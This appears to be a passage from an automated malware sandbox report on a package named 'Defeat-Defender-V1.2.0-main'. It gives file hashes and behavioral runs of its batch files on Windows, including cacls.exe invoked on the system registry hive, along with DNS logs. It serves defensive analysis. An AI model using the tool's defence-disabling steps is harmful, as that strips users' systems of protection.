C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 209ccebe007bd02a6ed398b58e396e9a |
| SHA1 | efee58463413a6f45f774c0de70ec5804bd98358 |
| SHA256 | cc51857b0aa3ea42f08ee8a38658bbdeb65c8da9423d361c6743259cba521010 |
| SHA512 | 844ed7757f5c3e4e8fdfc43c7fbb254b228be307f3a6556d15184aed251e3dc7ef9b4d270cba42f219ee74da7bd701250b45e7edbd78be01a9d7784f89c47012 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 86506a4800f7637b54bb829ce57db262 |
| SHA1 | c36581f315f3a4485d7f2f17b0c999f18441ba2b |
| SHA256 | 4db2822ab4fc6eb1deaea875060fec7622847cfb01ffd9bba47dadccfb08a394 |
| SHA512 | 37aea1b4605090110e5000bf54ed1c7c95591c6c38a8d1241d2f31abe7c79f17ea37f6bcad7f63cd9f215c9686217fac634d99672ea9c00c26c620d095dbe597 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\51f4caa7-2bd1-4ec3-8004-1811418c29f2
| MD5 | 37fc5355273ca6d96ec2dc2cbc521570 |
| SHA1 | e6c588bb45c1b54205c2991f35508876a2374d26 |
| SHA256 | 173fadcdf75446cef5507c8261832059eeff6eedd3597069d50a328610e8e868 |
| SHA512 | 2350bc64e2ebb7dc1556f812fad1deab028eaf1040ccf65f062776caa60514d8ce55287d77ee0998aec5259e19686033fc43d537a000a2425a90ab2a59e2b775 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\e23b16cf-7dd7-449e-a198-4a473e8f4033
| MD5 | b111c8b757c16e6d177f3d310fc1f461 |
| SHA1 | 4d8db094d53be5910dc26a42330f6dcb63ad7cb6 |
| SHA256 | e282f0a3a3765d48fd695d535415449336bb812f260bbace69eccd9e12a081b8 |
| SHA512 | f1d12d1a1da4ebb99e40d18b121f72600abe7bb77eb8ea6413a54893919c36c75682460188a3b7fa1f9fd3dd291b143bc3cc07c91e6d01f8f541a93c90afed55 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\pending_pings\109ebbf2-c959-46c0-9dce-57ab69297c1a
| MD5 | 6122274942c316f4c28b56adba70eb41 |
| SHA1 | 8babbf09fda8ca48cdd139236fc8a939d23b0b49 |
| SHA256 | 680c640ab6b7d59682b8cd9a24e2bad6805845519ada87cec909fd95acd616dc |
| SHA512 | 29a58ebb574e03eada27a272a68c9e82504a2def1da22553acd7578daf7443cad34815ccbbeb7eb9044debe454fe399bc1bfb6b52153758c3546609c757a62cf |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 80fbd95a165e211af3b1628e62a20aee |
| SHA1 | 9a951366d5d1dc69daf318e3ad459a000ed2f72f |
| SHA256 | 167edc479be461887b6e6d8f3f1512cd499367c7fc17f041e9324033cacfb2b9 |
| SHA512 | b81c37a0873a0ee895fb141e60ecf1c1245e094a24fb7aeefbd675b08ac917fedbddd33d3328647b63eadb602c6272d892efa9ff3499e080f48707a2da2f3179 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | af7f2f23af43f8c7fbb8c5186113fa0c |
| SHA1 | 00078bc10c52d0b3304fed9ae82da359bc542475 |
| SHA256 | 9f76c4125f8f09603965f35da216c368222587caaa6322d0280fdca6064b8357 |
| SHA512 | 3a596f35ee743af9568666a822b07d43eb00169f3f03fe253873cfaca279681c485dba29505dfc390841f39f2d7f57f4c02424d0db6fac8b0aaa3fe667e3df63 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js
| MD5 | 6d5e0935a4489aa29b172a6b1d3ee009 |
| SHA1 | 2172f0ff0973edb9ec426d0b73b73577aaf08ee3 |
| SHA256 | 1c1f91470c1a9c57357f6b2c30ea43858ee3120408d3b094519544f801c84639 |
| SHA512 | 635385b91088007eb8eeac4fff79752b8abbfe4da471e0a08e847a2cc3e5da9782e6b2b2a28e7cbe3cebedf0d1898e6e6e1782e1e83d1875f7c4188b69de54a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js
| MD5 | 42d264a96957a61c3c49e3465317e8d5 |
| SHA1 | 3fb4550a895d7b273eac54f88be752b6906e1558 |
| SHA256 | b6cbb9f1c12bad5fb701e161ce0fb4e4e05a9ca3b830645ac199cff9cecd06b9 |
| SHA512 | ba5cd4b192d2378fa37238a7ca77c667c87ed48dc76b117274d475b341d25cf75e07c22b7514e4740868073c7df15a28f16da49ccdfaa97155a019877e4aff09 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\AlternateServices.bin
| MD5 | a16857bc593b8fe295972e014e976aba |
| SHA1 | 7872314cd27f2bf6c62cbccb48cf3786e766bf12 |
| SHA256 | 20e8b466c7082a5a4bb05a34028d9e0ba60c8d52ec9e3c3e3f4aa7af67ec6755 |
| SHA512 | 0122d151a3142bb7ddf0d76a7b46ca28532830542968a4018dc5cda8b00eccd0db9b8195d1830e70202514b09a8701a62dd73e9a0489d90450f1e1d6dedc42e8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 8168174f76dd892bb3fc28b8557401f1 |
| SHA1 | 4afcad07c901dc90115b95196f4ca915fc340529 |
| SHA256 | d7086b4a856f33701eb705fdb7995d3b1b713e40b4ef09a017640c62de1ac113 |
| SHA512 | ed060937c742fc3501eeeb1b4a6741c9518acca34bc4ef815c53a32fa16e6899ccf7a27be8f508194e8a79dc5096eac556bca78e3d7f653bfcfe1880e32266fd |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs-1.js
| MD5 | 4b03546a216a8974455c8101dc7d26a7 |
| SHA1 | ab052b6bc2506cf74bdf6c1dea0926602a578d22 |
| SHA256 | 4dd67f19d9b5b4ca845ce420cafe5011330276228b20cb65ea84cd989ba0264d |
| SHA512 | b0a05bc22b2167870949764b940da8bce45c5bd31a71ec8d9285c84b4ccda5898eac5b4ba0f072a3959b39ef20bc2811d4deb07b33ebc9d3f78424de25c44881 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\AlternateServices.bin
| MD5 | fd9de7b9cfd31252e53842807939835b |
| SHA1 | de4cbc9412899f5d969f1a69c71049342403db49 |
| SHA256 | 4298537a25af075cb10b73f6ff9669756ca2ac967e572e98b51451bc2eb80616 |
| SHA512 | 2b1254f2d1b773c6b8d034b035850bc1c9593d9a24ef2089efeea28c21799c7ce8648f9f4281804c48333b998349bdb28cf947e088cc4cd971b243ecfcc72819 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\sessionstore-backups\recovery.baklz4
| MD5 | d328cfb915782830c3be2dcc808b652c |
| SHA1 | c46cba55e09527952e0358f48243df23d0046b0b |
| SHA256 | 23eace026d3ef2f536df9f17aaae7a63b915bf4e55b2c239808d3726b9328039 |
| SHA512 | ca88a5dcacf2e03444c7de6b1fdb39f998bee760fc0431d034a57de860ba60c20840f79a2dbbd337ee7b312e79f2951768ff57f068bd8424924d90730b3b082a |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\sessionstore-backups\recovery.baklz4
| MD5 | b3b0e0449805bb6a5f260b81c3c172b1 |
| SHA1 | 983aadf04b69a81268f0c2917fe024d7c7d69af5 |
| SHA256 | cd2603ac2215af7b38b81eb80f71402f8e0969cad02273501aaa1f5f6415a103 |
| SHA512 | 87dd1dd422bf1f5c7eb51887867f08041630f097a97ab5c74464ce07ef65fef8d8ecd68522af9fdfb47183f7ca4195b269b7634087fe774c0498ee100bb840c9 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win7-20240704-en
Max time kernel
119s
Max time network
119s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2572 wrote to memory of 2096 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cacls.exe |
| PID 2572 wrote to memory of 2096 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cacls.exe |
| PID 2572 wrote to memory of 2096 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cacls.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win10v2004-20240802-en
Max time kernel
94s
Max time network
150s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3104 wrote to memory of 4360 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cacls.exe |
| PID 3104 wrote to memory of 4360 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cacls.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Enable Smart Screen.bat"
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 18.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win7-20240729-en
Max time kernel
91s
Max time network
17s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\run.bat"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |